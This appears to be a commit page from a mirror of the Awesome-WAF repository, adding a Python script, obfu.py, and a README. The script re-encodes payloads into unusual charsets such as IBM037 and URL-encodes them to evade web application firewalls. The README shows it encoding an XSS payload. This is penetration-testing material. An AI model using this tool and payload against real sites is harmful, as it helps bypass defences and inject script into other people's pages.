mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 22:03:39 +07:00
Added a script for easy payload obfuscation
This commit is contained in:
parent
427d13a7b0
commit
40ee2bc005
34
others/README.md
Normal file
34
others/README.md
Normal file
@ -0,0 +1,34 @@
|
||||
## [`obfu.py`](https://github.com/0xinfection/awesome-waf/blob/master/other/obfu.py)
|
||||
> A small script to encode and obfuscate your payloads easily to your desired encodings.
|
||||
|
||||
### Usage:
|
||||
```
|
||||
$ python obfu.py -h
|
||||
|
||||
OBFUSCTOR
|
||||
|
||||
usage: python3 obfu.py [-h] [-s STR] [-e ENC] [-ueo] [-udi]
|
||||
|
||||
Required Arguments:
|
||||
-s STR, --str STR String to obfuscate
|
||||
-e ENC, --enc ENC Encoding type. eg: ibm037, utf16, etc
|
||||
|
||||
Optional Arguments:
|
||||
-ueo URL Encode Output
|
||||
-udi URL Decode Input
|
||||
```
|
||||
### Example Usage:
|
||||
```
|
||||
python3 obfu.py -s param=<svg/onload=prompt()// -e ibm037 -ueo
|
||||
```
|
||||
```
|
||||
$ python obfu.py -s 'param=<svg/onload=prompt()//' -e ibm037 -ueo
|
||||
|
||||
OBFUSCATOR
|
||||
|
||||
Input: param=<svg/onload=prompt()//
|
||||
Output: %97%81%99%81%94~L%A2%A5%87a%96%95%93%96%81%84~%97%99%96%94%97%A3M%5Daa
|
||||
```
|
||||
|
||||
### Sidenote:
|
||||
This script can encode in all types of formats which are supported by the Python Engine.
|
62
others/obfu.py
Normal file
62
others/obfu.py
Normal file
@ -0,0 +1,62 @@
|
||||
import urllib.parse, sys
|
||||
from argparse import ArgumentParser
|
||||
lackofart = '''
|
||||
OBFUSCATOR
|
||||
'''
|
||||
|
||||
def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):
|
||||
result = ""
|
||||
equalSign = "="
|
||||
ampersand = "&"
|
||||
if '=' and '&' in params:
|
||||
if encodeEqualSign:
|
||||
equalSign = equalSign.encode(charset)
|
||||
if encodeAmpersand:
|
||||
ampersand = ampersand.encode(charset)
|
||||
params_list = params.split("&")
|
||||
for param_pair in params_list:
|
||||
param, value = param_pair.split("=")
|
||||
if urlDecodeInput:
|
||||
param = urllib.parse.unquote(param)
|
||||
value = urllib.parse.unquote(value)
|
||||
param = param.encode(charset)
|
||||
value = value.encode(charset)
|
||||
if urlEncodeOutput:
|
||||
param = urllib.parse.quote_plus(param)
|
||||
value = urllib.parse.quote_plus(value)
|
||||
if result:
|
||||
result += ampersand
|
||||
result += param + equalSign + value
|
||||
else:
|
||||
if urlDecodeInput:
|
||||
params = urllib.parse.unquote(params)
|
||||
result = params.encode(charset)
|
||||
if urlEncodeOutput:
|
||||
result = urllib.parse.quote_plus(result)
|
||||
return result
|
||||
|
||||
def main():
|
||||
print(lackofart)
|
||||
parser = ArgumentParser('python3 obfu.py')
|
||||
parser._action_groups.pop()
|
||||
|
||||
# A simple hack to have required arguments and optional arguments separately
|
||||
required = parser.add_argument_group('Required Arguments')
|
||||
optional = parser.add_argument_group('Optional Arguments')
|
||||
|
||||
# Required Options
|
||||
required.add_argument('-s', '--str', help='String to obfuscate', dest='str')
|
||||
required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, ibm420, etc', dest='enc')
|
||||
|
||||
# Optional Arguments (main stuff and necessary)
|
||||
optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
|
||||
optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
|
||||
args = parser.parse_args()
|
||||
if not len(sys.argv) > 1:
|
||||
parser.print_help()
|
||||
quit()
|
||||
print('Input: %s' % (args.str))
|
||||
print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
Loading…
Reference in New Issue
Block a user